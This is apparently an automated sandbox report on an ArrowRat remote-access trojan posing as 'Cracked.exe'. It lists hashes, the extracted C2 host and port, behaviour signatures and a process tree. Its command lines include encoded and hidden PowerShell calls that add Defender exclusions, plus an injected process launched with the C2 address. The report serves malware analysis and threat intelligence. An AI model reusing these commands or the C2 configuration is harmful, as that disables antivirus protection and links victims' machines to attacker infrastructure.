Analysis

  • max time kernel
    144s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-07-2023 20:39

General

  • Target

    Cracked.exe

  • Size

    2.4MB

  • MD5

    6eb284564aa7bd24f4f6df02ef05d185

  • SHA1

    47f85ddc0b1a090d1852c37b2e2e1449e5b6db88

  • SHA256

    2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb

  • SHA512

    49e1a9584c74f32f9566d3c4ca31684c474ec260e50bd07b8d3c0a8ef3f3e70d10773952e5d219aa8c9076b86cddcefd242dfb91b507feeb06c5d69ba9e91179

  • SSDEEP

    49152:Wm7ZuvKRXc8DJ2c2Xp95LBO1PJNNNQzgj7k/8E54IlDXRRtdQNH:D77P2XPOxJ9FcEq4IZXRRC

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

line-ellis.gl.at.ply.gg:10735

Mutex

nAChhjAnR

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\Cracked.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1772
    • C:\Windows\Client.exe
      "C:\Windows\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4924
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2992
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
        3⤵
          PID:3940
        • C:\Windows\System32\ComputerDefaults.exe
          "C:\Windows\System32\ComputerDefaults.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3852
          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
            "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3232
      • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
        "C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:3780
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:3044
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1660
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1660 -s 3976
        2⤵
        • Program crash
        PID:2320
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 416 -p 1660 -ip 1660
      1⤵
        PID:5060
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:2876
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2876 -s 3564
          2⤵
          • Program crash
          PID:2056
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 404 -p 2876 -ip 2876
        1⤵
          PID:4168
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:1812
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 1812 -s 3500
            2⤵
            • Program crash
            PID:4220
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 512 -p 1812 -ip 1812
          1⤵
            PID:4536
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:5012
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 5012 -s 3564
              2⤵
              • Program crash
              PID:3468
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 468 -p 5012 -ip 5012
            1⤵
              PID:2548
            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:2980
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2980 -s 3540
                2⤵
                • Program crash
                PID:3788
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -pss -s 528 -p 2980 -ip 2980
              1⤵
                PID:3560
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                • Modifies registry class
                PID:4956

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                e243a38635ff9a06c87c2a61a2200656

                SHA1

                ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                SHA256

                af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                SHA512

                4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

                Filesize

                97B

                MD5

                402e0c5b12db3a5ffb0bece9995d459b

                SHA1

                f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2

                SHA256

                6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2

                SHA512

                5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

                Filesize

                36KB

                MD5

                8aaad0f4eb7d3c65f81c6e6b496ba889

                SHA1

                231237a501b9433c292991e4ec200b25c1589050

                SHA256

                813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

                SHA512

                1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

              • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe

                Filesize

                36KB

                MD5

                94b56d65a8b7f7253aeacac345d4b096

                SHA1

                7e11e248ae804d3647479a4fe5f03835a1eee4bc

                SHA256

                0f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be

                SHA512

                538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

                Filesize

                97B

                MD5

                402e0c5b12db3a5ffb0bece9995d459b

                SHA1

                f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2

                SHA256

                6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2

                SHA512

                5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

                Filesize

                97B

                MD5

                402e0c5b12db3a5ffb0bece9995d459b

                SHA1

                f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2

                SHA256

                6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2

                SHA512

                5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

              • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\S331LB7M\microsoft.windows[1].xml

                Filesize

                97B

                MD5

                402e0c5b12db3a5ffb0bece9995d459b

                SHA1

                f0138de23eb90c99efb1d0b1bd0dac8f1e7102a2

                SHA256

                6272b42676075c969ca60882f74e3c1711a3b6db824c9bb9b7f5b412e2131bc2

                SHA512

                5caea684bcc1aa6b3ade82c94fbab992c65f3b543a999f1435c683ec785eab784e86940545cdc35641401f1ead5d28dddf5ccb34156a054c36b566fc8cbbe8f2

              • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

                Filesize

                2.2MB

                MD5

                70f3bc193dfa56b78f3e6e4f800f701f

                SHA1

                1e5598f2de49fed2e81f3dd8630c7346a2b89487

                SHA256

                3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                SHA512

                3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

              • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

                Filesize

                2.2MB

                MD5

                70f3bc193dfa56b78f3e6e4f800f701f

                SHA1

                1e5598f2de49fed2e81f3dd8630c7346a2b89487

                SHA256

                3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                SHA512

                3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

              • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

                Filesize

                2.2MB

                MD5

                70f3bc193dfa56b78f3e6e4f800f701f

                SHA1

                1e5598f2de49fed2e81f3dd8630c7346a2b89487

                SHA256

                3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                SHA512

                3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xm0fsxu5.dgw.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\System.dll

                Filesize

                11KB

                MD5

                a4dd044bcd94e9b3370ccf095b31f896

                SHA1

                17c78201323ab2095bc53184aa8267c9187d5173

                SHA256

                2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

                SHA512

                87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

              • C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\nsDialogs.dll

                Filesize

                9KB

                MD5

                0d45588070cf728359055f776af16ec4

                SHA1

                c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                SHA256

                067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                SHA512

                751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

              • C:\Users\Admin\AppData\Local\Temp\nso90C8.tmp\nsDialogs.dll

                Filesize

                9KB

                MD5

                0d45588070cf728359055f776af16ec4

                SHA1

                c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                SHA256

                067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                SHA512

                751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

              • C:\Windows\Client.exe

                Filesize

                158KB

                MD5

                d7dea9816b882cb53d615a3afdf0c955

                SHA1

                d3bfd91ff74c072028bd747d4f56f17cc55168a5

                SHA256

                96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                SHA512

                b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

              • C:\Windows\Client.exe

                Filesize

                158KB

                MD5

                d7dea9816b882cb53d615a3afdf0c955

                SHA1

                d3bfd91ff74c072028bd747d4f56f17cc55168a5

                SHA256

                96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                SHA512

                b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

              • C:\Windows\Client.exe

                Filesize

                158KB

                MD5

                d7dea9816b882cb53d615a3afdf0c955

                SHA1

                d3bfd91ff74c072028bd747d4f56f17cc55168a5

                SHA256

                96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                SHA512

                b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

              • memory/1660-241-0x0000022F16100000-0x0000022F16120000-memory.dmp

                Filesize

                128KB

              • memory/1660-244-0x0000022F15DB0000-0x0000022F15DD0000-memory.dmp

                Filesize

                128KB

              • memory/1660-248-0x0000022F164C0000-0x0000022F164E0000-memory.dmp

                Filesize

                128KB

              • memory/1684-133-0x0000000000A80000-0x0000000000CE0000-memory.dmp

                Filesize

                2.4MB

              • memory/1684-163-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/1684-134-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/1684-136-0x0000000001590000-0x00000000015A0000-memory.dmp

                Filesize

                64KB

              • memory/1684-135-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/1772-220-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

                Filesize

                64KB

              • memory/1772-200-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

                Filesize

                64KB

              • memory/1772-164-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/1772-224-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/1772-184-0x00000240F3B40000-0x00000240F3B62000-memory.dmp

                Filesize

                136KB

              • memory/1772-167-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

                Filesize

                64KB

              • memory/1772-165-0x00000240F3BB0000-0x00000240F3BC0000-memory.dmp

                Filesize

                64KB

              • memory/1812-288-0x000001F22CB40000-0x000001F22CB60000-memory.dmp

                Filesize

                128KB

              • memory/1812-291-0x000001F22CF50000-0x000001F22CF70000-memory.dmp

                Filesize

                128KB

              • memory/1812-284-0x000001F22CB80000-0x000001F22CBA0000-memory.dmp

                Filesize

                128KB

              • memory/2876-263-0x00000217C82A0000-0x00000217C82C0000-memory.dmp

                Filesize

                128KB

              • memory/2876-265-0x00000217C8260000-0x00000217C8280000-memory.dmp

                Filesize

                128KB

              • memory/2876-267-0x00000217C8880000-0x00000217C88A0000-memory.dmp

                Filesize

                128KB

              • memory/2980-323-0x0000015F3CE10000-0x0000015F3CE30000-memory.dmp

                Filesize

                128KB

              • memory/2980-325-0x000001673E420000-0x000001673E440000-memory.dmp

                Filesize

                128KB

              • memory/2980-319-0x0000015F3CE50000-0x0000015F3CE70000-memory.dmp

                Filesize

                128KB

              • memory/2992-234-0x0000000002B00000-0x0000000002B01000-memory.dmp

                Filesize

                4KB

              • memory/3232-231-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/3232-219-0x000002CD01CC0000-0x000002CD01CD0000-memory.dmp

                Filesize

                64KB

              • memory/3232-218-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/3232-228-0x000002CD01CC0000-0x000002CD01CD0000-memory.dmp

                Filesize

                64KB

              • memory/3940-198-0x0000000005000000-0x0000000005010000-memory.dmp

                Filesize

                64KB

              • memory/3940-158-0x0000000000400000-0x0000000000418000-memory.dmp

                Filesize

                96KB

              • memory/3940-201-0x0000000005590000-0x00000000055F6000-memory.dmp

                Filesize

                408KB

              • memory/3940-249-0x0000000005000000-0x0000000005010000-memory.dmp

                Filesize

                64KB

              • memory/3940-204-0x0000000005E80000-0x0000000005ED0000-memory.dmp

                Filesize

                320KB

              • memory/3940-232-0x00000000745C0000-0x0000000074D70000-memory.dmp

                Filesize

                7.7MB

              • memory/3940-196-0x0000000004E80000-0x0000000004F1C000-memory.dmp

                Filesize

                624KB

              • memory/3940-195-0x00000000745C0000-0x0000000074D70000-memory.dmp

                Filesize

                7.7MB

              • memory/3940-194-0x0000000004DD0000-0x0000000004E62000-memory.dmp

                Filesize

                584KB

              • memory/3940-199-0x00000000056D0000-0x0000000005C74000-memory.dmp

                Filesize

                5.6MB

              • memory/4924-233-0x000001EF759D0000-0x000001EF759E0000-memory.dmp

                Filesize

                64KB

              • memory/4924-197-0x000001EF759D0000-0x000001EF759E0000-memory.dmp

                Filesize

                64KB

              • memory/4924-227-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/4924-150-0x00007FFA9B1E0000-0x00007FFA9BCA1000-memory.dmp

                Filesize

                10.8MB

              • memory/4924-148-0x000001EF5B460000-0x000001EF5B48E000-memory.dmp

                Filesize

                184KB

              • memory/5012-301-0x0000028470A20000-0x0000028470A40000-memory.dmp

                Filesize

                128KB

              • memory/5012-303-0x0000028470E20000-0x0000028470E40000-memory.dmp

                Filesize

                128KB

              • memory/5012-298-0x0000028470A60000-0x0000028470A80000-memory.dmp

                Filesize

                128KB